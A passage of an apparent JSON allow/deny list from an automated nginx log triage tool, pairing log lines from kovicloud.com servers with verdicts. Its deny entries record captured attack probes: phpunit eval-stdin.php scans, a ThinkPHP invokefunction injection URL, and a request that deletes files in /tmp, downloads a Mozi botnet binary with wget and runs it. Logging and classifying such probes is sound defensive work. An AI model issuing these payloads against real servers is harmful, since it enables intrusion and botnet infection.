"2026-03-20T15:46:40.857321515Z" }, "59fbf17adad9b28cbd08fa8152c43b3f9e7ddd7364084226ed0400be9df0b00d": { "type": "hash", "value": "59fbf17adad9b28cbd08fa8152c43b3f9e7ddd7364084226ed0400be9df0b00d", "source": "auto", "reason": "Normal HTTP access log from a web asset request with a common user agent string (GPTBot). No anomalies detected.", "original_line": "\"login.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 1418 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T15:47:29.075787583Z" }, "5e1eb430841f9e032fbf902569ce2ce702a0ae6285e31de098f9aa74f2b6acec": { "type": "hash", "value": "5e1eb430841f9e032fbf902569ce2ce702a0ae6285e31de098f9aa74f2b6acec", "source": "auto", "reason": "Normal nginx warning about upstream buffering to a temporary file, common during high load or large responses; not indicative of malicious activity", "original_line": "[warn] \u003cPID\u003e: *\u003cCONN\u003e an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/24/0000003248 while reading upstream, client: \u003cCLIENT\u003e, server: captain.admin.kovicloud.com, request: \"GET /static/js/main.ecef38b1.js HTTP/2.0\", upstream: \"http://10.0.1.2:3000/static/js/main.ecef38b1.js\", host: \"captain.admin.kovicloud.com\", referrer: \"https://captain.admin.kovicloud.com/\"", "created_at": "2026-03-20T10:32:40.737865054Z" }, "5eaea1c3324c906afba9a49376d86e44062f2c111c6c2a59ddfeda829610c38f": { "type": "hash", "value": "5eaea1c3324c906afba9a49376d86e44062f2c111c6c2a59ddfeda829610c38f", "source": "auto", "reason": "Regular API POST resulting in HTTP 422; likely a validation error rather than an attack. No clear malicious pattern detected.", "original_line": "\"api.admin.kovicloud.com\" \"\u003cVAR\u003e\" 422 84 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T02:42:37.892743973Z" }, "631768e82da5f082a40bc12938d6efbb1a94318672d806aff947ceb384c67f59": { "type": "hash", "value": "631768e82da5f082a40bc12938d6efbb1a94318672d806aff947ceb384c67f59", "source": "auto", "reason": "Typical nginx access log entry with a successful 200 response and a benign user agent string from Palo Alto Networks. No anomalous indicators detected.", "original_line": "\"_\" \"\u003cVAR\u003e\" 200 2401 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T00:31:23.238846558Z" }, "644281e2a86c19bd4915233d5ae5082c8f24547757219396c9322ff70b835eac": { "type": "hash", "value": "644281e2a86c19bd4915233d5ae5082c8f24547757219396c9322ff70b835eac", "source": "auto", "reason": "Standard access log entry with a successful GET request returning 200. No anomalies detected; includes a known bot user agent but still normal web traffic.", "original_line": "\"login.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 284 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T15:46:52.469892549Z" }, "68f25e171efb68c482f6b3cfd1f0eec06f32a83c2d698dd0acac398a32dd1e27": { "type": "hash", "value": "68f25e171efb68c482f6b3cfd1f0eec06f32a83c2d698dd0acac398a32dd1e27", "source": "auto", "reason": "Looks like a normal Nginx HTTP access log entry for a legitimate API request returning 304 (not modified); no exploit indicators present.", "original_line": "\"captain.admin.kovicloud.com\" \"\u003cVAR\u003e\" 304 0 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-19T22:24:42.577622896Z" }, "6f0f63a5bd2460e67c5d49cf9f1cc7ceeb92f4730d0b16a2fed12f61e6445422": { "type": "hash", "value": "6f0f63a5bd2460e67c5d49cf9f1cc7ceeb92f4730d0b16a2fed12f61e6445422", "source": "auto", "reason": "Standard nginx access log entry showing a GET request for robots.txt from a crawler; no anomalies detected", "original_line": "\"api.admin.kovicloud.com\" \"\u003cVAR\u003e\" 206 24 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T12:31:47.202123572Z" }, "7e2d3854eb16b3fc1a4495f32591b4bd3ab71791241ad8ebb42d0b9cdd20c500": { "type": "hash", "value": "7e2d3854eb16b3fc1a4495f32591b4bd3ab71791241ad8ebb42d0b9cdd20c500", "source": "auto", "reason": "Normal HTTP access log for favicon request returning 200; no anomalies detected.", "original_line": "\"login.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 4124 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T15:46:34.70511556Z" }, "7e87eae6b7bc8a50d42afc80ac27dc915ad6bf9f765b0dd3e80a59c7960b72d1": { "type": "hash", "value": "7e87eae6b7bc8a50d42afc80ac27dc915ad6bf9f765b0dd3e80a59c7960b72d1", "source": "auto", "reason": "Appears to be a normal successful HTTP/2 request to an application endpoint (status 200) with typical access-log fields; no obvious exploit indicators.", "original_line": "\"captain.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 13453 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-19T22:35:07.794619564Z" }, "824d7fc14189d28d54e6e56e11c15f73f166413dba10fe92defdec90789e42c1": { "type": "hash", "value": "824d7fc14189d28d54e6e56e11c15f73f166413dba10fe92defdec90789e42c1", "source": "auto", "reason": "Normal nginx error log for missing robots.txt; not indicative of an attack or misconfiguration requiring immediate action.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/robots.txt\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /robots.txt HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T10:25:49.173419588Z" }, "85159dcac0738677cdd77303113be565deef7703ba8074326dd83958b50009b4": { "type": "hash", "value": "85159dcac0738677cdd77303113be565deef7703ba8074326dd83958b50009b4", "source": "auto", "reason": "Normal HTTP access log with a bot user agent receiving a redirect; no anomalous activity detected.", "original_line": "\"media-api.admin.kovicloud.com\" \"\u003cVAR\u003e\" 307 69 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T13:09:40.916890781Z" }, "9c1266e1cb68cdff0588b463d08bc2629b70150bb79dc8f703792341358b8d8d": { "type": "hash", "value": "9c1266e1cb68cdff0588b463d08bc2629b70150bb79dc8f703792341358b8d8d", "source": "auto", "reason": "Normal web access log entry showing a GET request with a GPTBot user agent to the root path and a 200 response.", "original_line": "\"test3.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 2401 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T14:10:08.236583504Z" }, "9cf76d35d1ec256231960d4a506f7be254fa72da3caf24287a27ea0b7b09c41d": { "type": "hash", "value": "9cf76d35d1ec256231960d4a506f7be254fa72da3caf24287a27ea0b7b09c41d", "source": "auto", "reason": "This is a normal nginx access log line showing a successful GET request for a static JS asset from a client, typical web traffic.", "original_line": "\"captain.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 2556886 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T13:12:38.827899152Z" }, "9ef562070eab3aff49a7833a8516893df847ce5e55b135e3686f3245305aba08": { "type": "hash", "value": "9ef562070eab3aff49a7833a8516893df847ce5e55b135e3686f3245305aba08", "source": "auto", "reason": "Routine GET to robots.txt from a bot; no anomalous behavior detected.", "original_line": "\"captain.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 26 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T02:40:30.654743229Z" }, "a666d7016b2a9a796eca4f67aa508c8cbb75ee3cfb54456716e209a1209476e1": { "type": "hash", "value": "a666d7016b2a9a796eca4f67aa508c8cbb75ee3cfb54456716e209a1209476e1", "source": "auto", "reason": "Routine health check request to /checkhealth returning HTTP 200 with small response size.", "original_line": "\"captain.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 36 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-19T22:24:39.823481581Z" }, "a8fb2c9f0f67ee4b6c6a8e0e9ebd2097aa5546c9fdefadc26649377d4f597f3a": { "type": "hash", "value": "a8fb2c9f0f67ee4b6c6a8e0e9ebd2097aa5546c9fdefadc26649377d4f597f3a", "source": "auto", "reason": " nginx error log indicating a missing file; common in web traffic and not an attack", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/myfile.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /myfile.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:09:16.098808553Z" }, "aa339f37018149792e55c00b2c2cb9623fd92aacbaa4679465f64ce343459334": { "type": "hash", "value": "aa339f37018149792e55c00b2c2cb9623fd92aacbaa4679465f64ce343459334", "source": "auto", "reason": "Normal nginx error log indicating a missing file for a requested PHP resource; not indicative of attack", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/zc-104.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /zc-104.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:02:26.992541366Z" }, "ad3c12f43f5560ce05b118abf01307eb38e8119d301639856b72719b4dd0b5e3": { "type": "hash", "value": "ad3c12f43f5560ce05b118abf01307eb38e8119d301639856b72719b4dd0b5e3", "source": "auto", "reason": "Normal nginx error log indicating a missing file; not indicative of attack.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/init.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /init.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:10:02.265069952Z" }, "ade1ae83a96af9db5100a87b07f7f33734b606793fc6c1e0b04d6c891ff501f1": { "type": "hash", "value": "ade1ae83a96af9db5100a87b07f7f33734b606793fc6c1e0b04d6c891ff501f1", "source": "auto", "reason": "Normal nginx warning about request body buffering; not indicative of malicious activity.", "original_line": "[warn] \u003cPID\u003e: *\u003cCONN\u003e a client request body is buffered to a temporary file /var/cache/nginx/client_temp/0000003249, client: \u003cCLIENT\u003e, server: api.admin.kovicloud.com, request: \"POST /api/locator-process-form HTTP/1.1\", host: \"api.admin.kovicloud.com\"", "created_at": "2026-03-20T12:45:44.357823942Z" }, "b14af40b60f6e698df232da39eca8094a90f70f4d17f6680de5db3928025929b": { "type": "hash", "value": "b14af40b60f6e698df232da39eca8094a90f70f4d17f6680de5db3928025929b", "source": "auto", "reason": "Standard nginx access log line for a GET request to a favicon with normal status 200 and typical user agent; no anomalous indicators.", "original_line": "\"media.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 16066 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T06:24:00.851010459Z" }, "b2e3bac538b06716af8dc0bebbada219ddd11c73c6e6fb11203bf5278c3b9131": { "type": "hash", "value": "b2e3bac538b06716af8dc0bebbada219ddd11c73c6e6fb11203bf5278c3b9131", "source": "auto", "reason": "This is a standard nginx access log line with a 200 response, indicating normal operation and no evident malicious indicators.", "original_line": "\"media.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 57 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T10:47:17.069433377Z" }, "b357d6d3e4b3f090a661912daccbf2c7390566243cb470e8d2caab16f2cbb25f": { "type": "hash", "value": "b357d6d3e4b3f090a661912daccbf2c7390566243cb470e8d2caab16f2cbb25f", "source": "auto", "reason": "An nginx error about a missing favicon.ico file is a common, non-malicious event and typically normal operation.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/favicon.ico\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /favicon.ico HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T10:25:44.747774703Z" }, "bb5c9950919c926102bd3424898868970a86d3fcd7d0f3d69905d54298465aa1": { "type": "hash", "value": "bb5c9950919c926102bd3424898868970a86d3fcd7d0f3d69905d54298465aa1", "source": "auto", "reason": "Normal HTTP access log for a static asset (icon-512x512.png) with 200 OK from a client IP.", "original_line": "\"captain.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 59672 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T10:33:01.791208594Z" }, "bdffdf6249cf404fbf2e9fda50ad52385f25fc7dd00e4e51a4a56da5ed2981c0": { "type": "hash", "value": "bdffdf6249cf404fbf2e9fda50ad52385f25fc7dd00e4e51a4a56da5ed2981c0", "source": "auto", "reason": "Normal nginx error log indicating a missing file being requested (potential probing, but common and not definitive malicious activity).", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/t.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /t.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:06:46.096543098Z" }, "c03fe01619583fea92c493d8d5c4123478e8995d5d8e170ffa337595174abd07": { "type": "hash", "value": "c03fe01619583fea92c493d8d5c4123478e8995d5d8e170ffa337595174abd07", "source": "auto", "reason": "Normal HTTP access to root path with 200 OK and common user-agent, typical web server log activity.", "original_line": "\"api.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 34049 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T11:13:00.871515972Z" }, "c4f756b27d79e5f6a3537338a07298e86e2fe5aa726595aad61f1d0104cfca93": { "type": "hash", "value": "c4f756b27d79e5f6a3537338a07298e86e2fe5aa726595aad61f1d0104cfca93", "source": "auto", "reason": "Regular HTTP GET asset fetch from a host, with a benign user agent string. No evident attack indicators.", "original_line": "\"login.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 24093 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T15:47:23.407917957Z" }, "cb673b466d252e1953bba87b3628aec84a5025770e9fa465213e34374a7fc8ba": { "type": "hash", "value": "cb673b466d252e1953bba87b3628aec84a5025770e9fa465213e34374a7fc8ba", "source": "auto", "reason": "Normal nginx access log entry for a GET request to a static asset, including a bot user agent. No anomalous indicators.", "original_line": "\"login.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 803 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T15:47:35.935283218Z" }, "cb87348ed5a6f735ac02c8dc11e08f965667e526804b8b79e3de84b4482e439d": { "type": "hash", "value": "cb87348ed5a6f735ac02c8dc11e08f965667e526804b8b79e3de84b4482e439d", "source": "auto", "reason": "Normal web access log showing a GET request with 200 status and a bot user-agent.", "original_line": "\"login.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 513 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T15:47:15.438387182Z" }, "d58ebeb036558133cd74f4d5bd17f4cd1972953810ec8446736462f22712cf8f": { "type": "hash", "value": "d58ebeb036558133cd74f4d5bd17f4cd1972953810ec8446736462f22712cf8f", "source": "auto", "reason": "Normal Nginx upstream buffering warning indicating non-critical operational condition.", "original_line": "[warn] \u003cPID\u003e: *\u003cCONN\u003e an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/25/0000003251 while reading upstream, client: \u003cCLIENT\u003e, server: captain.admin.kovicloud.com, request: \"GET /static/js/main.ecef38b1.js.map HTTP/1.1\", upstream: \"http://10.0.1.2:3000/static/js/main.ecef38b1.js.map\", host: \"captain.admin.kovicloud.com\"", "created_at": "2026-03-20T13:12:43.78798449Z" }, "dc0ce129bfba5466f7219fe913e9a0c8681a938c928b4b307340e6ced5b176bd": { "type": "hash", "value": "dc0ce129bfba5466f7219fe913e9a0c8681a938c928b4b307340e6ced5b176bd", "source": "auto", "reason": "Normal HTTP GET request to root path from a host with standard 200 response and typical user agent string.", "original_line": "\"login.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 1184 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T15:46:46.274651821Z" }, "de8a2df2b4e2ea6d670e45c8e673f4de9d927ec58e0e3c79e34369b9bd2a3a7f": { "type": "hash", "value": "de8a2df2b4e2ea6d670e45c8e673f4de9d927ec58e0e3c79e34369b9bd2a3a7f", "source": "auto", "reason": "Normal HTTP GET for a static asset from a legitimate host with standard user agent; no anomalies detected.", "original_line": "\"captain.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 722383 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T10:32:47.675453256Z" }, "e61e30ef982ce481768e1733a69b9953f90c39a7bb817b4567820308b3a7cad4": { "type": "hash", "value": "e61e30ef982ce481768e1733a69b9953f90c39a7bb817b4567820308b3a7cad4", "source": "auto", "reason": "Looks like a normal Let’s Encrypt ACME HTTP-01 validation request to /.well-known/acme-challenge with 404 responses (not clearly an attack).", "original_line": "\"login.admin.kovicloud.com\" \"\u003cVAR\u003e\" 404 2401 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-19T22:31:36.92962035Z" }, "f6c53701c0ea2c30b6bc12069362e24ca8f53f0883d97ce1c670ce27a62cef1c": { "type": "hash", "value": "f6c53701c0ea2c30b6bc12069362e24ca8f53f0883d97ce1c670ce27a62cef1c", "source": "auto", "reason": "The log is an nginx error about a missing file, a common operational issue (not a clear attack).", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/66.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /66.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:07:00.725818211Z" }, "fbce8352acd17ba7de32f6d113bc87bd5b7e3c80074740ee063426293e9f907a": { "type": "hash", "value": "fbce8352acd17ba7de32f6d113bc87bd5b7e3c80074740ee063426293e9f907a", "source": "auto", "reason": "Normal HTTP access log showing a GET request from a client to the root path with standard 200 response", "original_line": "\"captain.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 978 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T02:06:51.142147984Z" }, "fdd07419122eb0c7cb2eb17f97ecc57e74a2eacf6d47e64b1a0ffb2df6602a94": { "type": "hash", "value": "fdd07419122eb0c7cb2eb17f97ecc57e74a2eacf6d47e64b1a0ffb2df6602a94", "source": "auto", "reason": "Nginx access log entry showing a successful HTTP GET returning 200 with normal application/API path and standard browser user agent.", "original_line": "\"captain.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 13437 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-19T22:29:59.041487735Z" } }, "prefixes": [ { "type": "prefix", "value": "captain.admin.kovicloud.com", "source": "llm", "reason": "Regular static asset request to an nginx-hosted site with a successful 200 response; no anomalous indicators.", "original_line": "\"captain.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 1354 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T10:32:36.940073677Z" }, { "type": "prefix", "value": "captain.admin.kovicloud.com", "source": "llm", "reason": "Normal HTTP GET for a static asset from a legitimate host with standard user agent; no anomalies detected.", "original_line": "\"captain.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 722383 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T10:32:47.675457548Z" }, { "type": "prefix", "value": "captain.admin.kovicloud.com", "source": "llm", "reason": "Normal HTTP access log for a static asset (icon-512x512.png) with 200 OK from a client IP.", "original_line": "\"captain.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 59672 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T10:33:01.791212084Z" }, { "type": "prefix", "value": "captain.admin.kovicloud.com", "source": "llm", "reason": "Standard HTTP access from a client to a manifest.json resource returning 200 OK. No abnormal patterns observed.", "original_line": "\"captain.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 355 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T13:13:04.511821015Z" }, { "type": "prefix", "value": "[error]", "source": "llm", "reason": "Normal nginx error log indicating a missing file; not indicative of attack.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/init.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /init.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:10:02.265075855Z" }, { "type": "prefix", "value": "login.admin.kovicloud.com", "source": "llm", "reason": "Normal HTTP access log showing a GET request to root with 200 status and standard user agent", "original_line": "\"login.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 1196 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T15:46:27.4098115Z" }, { "type": "prefix", "value": "login.admin.kovicloud.com", "source": "llm", "reason": "Standard access log entry for a GET request returning 200 OK from a bot user agent; no anomalies detected", "original_line": "\"login.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 60326 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T15:46:58.5886523Z" } ] }, "deny": { "hashes": { "00081b534658b205735afd0a6dab2e5c60e088ac9eaf5d98152f19fe20370cb5": { "type": "hash", "value": "00081b534658b205735afd0a6dab2e5c60e088ac9eaf5d98152f19fe20370cb5", "source": "auto", "reason": "Log shows an explicit request to a PHPunit file path (eval-stdin.php) commonly targeted in exploitation attempts; indicates probing for vulnerable phpunit component.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/lib/phpunit/Util/PHP/eval-stdin.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:46:36.242811439Z" }, "265d7b4e196920c88049aa8a00b012f9200298123e20418f766d074ac5bdc204": { "type": "hash", "value": "265d7b4e196920c88049aa8a00b012f9200298123e20418f766d074ac5bdc204", "source": "auto", "reason": "HTTP 405 on a POST with a suspicious query attempting PHP wrappers suggests an injection/exploitation attempt targeted at PHP config. Likely malicious probe.", "original_line": "\"54.200.221.0\" \"\u003cVAR\u003e\" 405 150 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T13:45:15.005013104Z" }, "4f1304e28b494da1f49e503bf5f0ecbe6cb8ea8170d5c306c47fb7d54dd9e5e6": { "type": "hash", "value": "4f1304e28b494da1f49e503bf5f0ecbe6cb8ea8170d5c306c47fb7d54dd9e5e6", "source": "auto", "reason": "Attempted access to phpunit eval-stdin.php path suggests probing for PHP unit-related vulnerability (potential LFI/RCE).", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:48:43.288656846Z" }, "566ef47f9157d624e9b63b40ec6eb24e15bdb8ea8dd97d9969c1d8725485fc2b": { "type": "hash", "value": "566ef47f9157d624e9b63b40ec6eb24e15bdb8ea8dd97d9969c1d8725485fc2b", "source": "auto", "reason": "Access attempt to a phpunit file path commonly abused in automated attacks; indicates probing for vulnerable PHP unit files.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:47:58.641443144Z" }, "58b0f04613d785f70ff514ec5bac5ef3e4cb5712f8d9bfb21a1fa00cf3ae0944": { "type": "hash", "value": "58b0f04613d785f70ff514ec5bac5ef3e4cb5712f8d9bfb21a1fa00cf3ae0944", "source": "auto", "reason": "Detected an open() failure on a suspicious path with a crafted request containing shell commands, indicating an attempted remote code execution or path traversal attack", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/shell\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T12:31:59.662379464Z" }, "5e6926ec8a0b6b751317b5ad617dd00b7bfbef81ab8d31bd61648f28337ac7c1": { "type": "hash", "value": "5e6926ec8a0b6b751317b5ad617dd00b7bfbef81ab8d31bd61648f28337ac7c1", "source": "auto", "reason": "SQL injection attempt detected in the query string (DROP TABLE) from client IP.", "original_line": "\"api.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 34020 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T00:00:01.551599538Z" }, "72d8b4dbf1ea3538f13f151211b419cacb0ece3a3064e4b2516d0b8c14bee14e": { "type": "hash", "value": "72d8b4dbf1ea3538f13f151211b419cacb0ece3a3064e4b2516d0b8c14bee14e", "source": "auto", "reason": "Log shows an attempted PHP thinkphp injection payload in the request URL targeting an index.php file, indicative of an exploit attempt.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/index.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /index.php?s=/index/\\think\\app/invokefunction\u0026function=call_user_func_array\u0026vars[0]=md5\u0026vars[1][]=Hello HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:48:52.517778796Z" }, "7ae55719a3111b5fa1d1fe4e63eac3d74ad71c9373afd34fd34095d8f0215c87": { "type": "hash", "value": "7ae55719a3111b5fa1d1fe4e63eac3d74ad71c9373afd34fd34095d8f0215c87", "source": "auto", "reason": "Access attempt to PHPunit test file paths (eval-stdin.php) commonly targeted in exploitation attempts; indicates probing for vulnerable components.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:47:31.312743615Z" }, "95b517790cf592fc485d59651d30ab0b3d5669e96f3c97407be810e14a22a78f": { "type": "hash", "value": "95b517790cf592fc485d59651d30ab0b3d5669e96f3c97407be810e14a22a78f", "source": "auto", "reason": "Attempted access to phpunit tooling path under /vendor/phpunit/phpunit, a common vector for exploiting PHP applications. The log shows an error opening a potentially sensitive file, indicating probing activity.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:47:46.72023237Z" }, "bf60283ccf7429631de2e2f877abcb02b644136b965ce0999cc293f4a4db52ab": { "type": "hash", "value": "bf60283ccf7429631de2e2f877abcb02b644136b965ce0999cc293f4a4db52ab", "source": "auto", "reason": "Request targets a known phpunit tooling path via /phpunit/Util/PHP/eval-stdin.php, which is a common probe for phpunit-related RCE exploits.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/phpunit/Util/PHP/eval-stdin.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:46:13.279061735Z" }, "e9d9632123c67c7d7170b29cfb295f8f0af30501c5c3f91f32e26e1430ff2519": { "type": "hash", "value": "e9d9632123c67c7d7170b29cfb295f8f0af30501c5c3f91f32e26e1430ff2519", "source": "auto", "reason": "HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation).", "original_line": "\"54.200.221.0\" 